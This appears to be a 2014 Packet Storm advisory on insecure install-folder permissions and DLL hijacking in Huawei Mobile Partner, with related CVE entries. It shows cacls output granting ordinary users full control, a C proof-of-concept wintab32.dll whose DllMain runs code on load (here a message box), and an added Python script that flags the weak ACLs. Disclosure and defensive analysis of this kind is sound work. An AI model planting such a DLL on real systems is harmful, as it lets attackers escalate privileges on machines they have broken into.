Huawei Mobile Partner DLL Hijacking

Published: 21 Oct 2014 00:00:00 | Reported by: Osanda Malith | Type: packetstorm | Source: packetstormsecurity.com

Huawei Mobile Partner Privilege Escalation and DLL Hijackin

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| ATTACKERKB | CVE-2014-8359 | 13 Nov 2014 21:32 | attackerkb |
| ATTACKERKB | CVE-2014-8358 | 11 Dec 2017 21:29 | attackerkb |
| CVE | CVE-2014-8358 | 11 Dec 2017 21:00 | cve |
| CVE | CVE-2014-8359 | 13 Nov 2014 15:00 | cve |
| Cvelist | CVE-2014-8358 | 11 Dec 2017 21:00 | cvelist |
| Cvelist | CVE-2014-8359 | 13 Nov 2014 15:00 | cvelist |
| EUVD | EUVD-2014-8195 | 7 Oct 2025 00:30 | euvd |
| EUVD | EUVD-2014-8196 | 7 Oct 2025 00:30 | euvd |
| Huawei | Security Advisory-DLL Hijacking Vulnerability on Huawei USB Modem products | 22 Oct 2014 00:00 | huawei |
| NVD | CVE-2014-8358 | 11 Dec 2017 21:29 | nvd |

```text
# Title: Huawei Mobile Partner Multiple Vulnerabilities
# Version: 23.009.05.03.1014
# Tested on: Windows XP SP2 en
# Vendor: http://www.huawei.com/
# Software-Link: http://download-c.huawei.com/download/downloadCenter?downloadId=18474&version=16815&siteCode=worldwide
# E-Mail: osanda[at]unseen.is
# Author: Osanda Malith Jayathissa
# /!\ Author is not responsible for any damage you cause
# Use this material for educational purposes only


#1| Local Privilege Escalation
--------------------------------

- Description
==============
Any user on the system can replace the legitimate binary with any kind of malicious executable.
The user could also place a malicious wintab32.dll file inside the "Mobile Partner" folder and
perform DLL hijacking easily. If an attacker breaks into a low-privilege account, he could use
this application to escalate his privileges.

- Proof of Concept
===================

C:\Program Files>cacls "Mobile Partner"
C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
                                BUILTIN\Users:(CI)F
                                NT SERVICE\TrustedInstaller:(ID)F
                                NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                NT AUTHORITY\SYSTEM:(ID)F
                                NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                BUILTIN\Administrators:(ID)F
                                BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F


C:\Program Files>cd "Mobile Partner"

C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F


#2| Dll Hijacking Vulnerability (wintab32.dll)
-----------------------------------------------
```

```c
#include <windows.h>

/* Declared before DllMain so the call below has a prototype in scope. */
int owned(void);

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        /* Runs once, when the host process loads wintab32.dll. */
        owned();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/* Proof-of-concept marker: shows a message box to prove the DLL was loaded. */
int owned(void) {
    MessageBoxA(0, "Mobile Partner DLL Hijacked\nOsanda Malith", "POC", MB_OK | MB_ICONWARNING);
    return 0;
}
/*EOF*/
```
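To make the `cacls` output in the proof of concept easier to read, the following added example (not part of the original advisory) parses it and lists the entries that give low-privilege groups write-capable access, with the scope implied by the `(OI)`, `(CI)`, `(IO)` and `(ID)` flags. The group list and the function names are assumptions of this example, and it handles only the single-letter rights that appear in the output above.

```python
import re
# Groups every ordinary local user belongs to (assumed list for this example).
LOW_PRIV = {"BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users"}
# cacls rights that let the holder replace or plant files: F=full, C=change, W=write.
WRITE_RIGHTS = {"F", "C", "W"}

# cacls output for the folder and the binary, copied from the proof of concept.
DIR_PATH = r"C:\Program Files\Mobile Partner"
DIR_ACL = r"""C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
BUILTIN\Users:(CI)F
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F"""
EXE_PATH = DIR_PATH + r"\Mobile Partner.exe"
EXE_ACL = r"""C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F
BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F"""

def parse_cacls(path, output):
    """Return (principal, flags, right) for every ACE line in `cacls <path>` output."""
    aces = []
    for line in map(str.strip, output.splitlines()):
        if line.startswith(path + " "):       # first line is prefixed with the path
            line = line[len(path):].strip()
        who, sep, rest = line.rpartition(":")  # principal names may contain spaces
        if sep:
            flags = re.findall(r"\((OI|CI|IO|ID)\)", rest)
            aces.append((who, flags, re.sub(r"\(\w+\)", "", rest).strip()))
    return aces

def writable_by_low_priv(path, output):
    """List ACEs granting write-capable rights to low-privilege groups, with scope."""
    findings = []
    for who, flags, right in parse_cacls(path, output):
        if who in LOW_PRIV and right in WRITE_RIGHTS:
            scope = [] if "IO" in flags else ["this object"]  # IO = inherit-only
            scope += [t for f, t in (("CI", "subfolders"), ("OI", "files")) if f in flags]
            findings.append((who, right, scope, "ID" in flags))  # ID = inherited ACE
    return findings

if __name__ == "__main__":
    for path, acl in ((DIR_PATH, DIR_ACL), (EXE_PATH, EXE_ACL)):
        for who, right, scope, inherited in writable_by_low_priv(path, acl):
            print(path, who, right, scope, "inherited" if inherited else "explicit")
```

Entries reported as explicit carry no `(ID)` flag, meaning they were set on that object directly rather than inherited from the parent folder, so they are the ones to remove when tightening the install directory.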
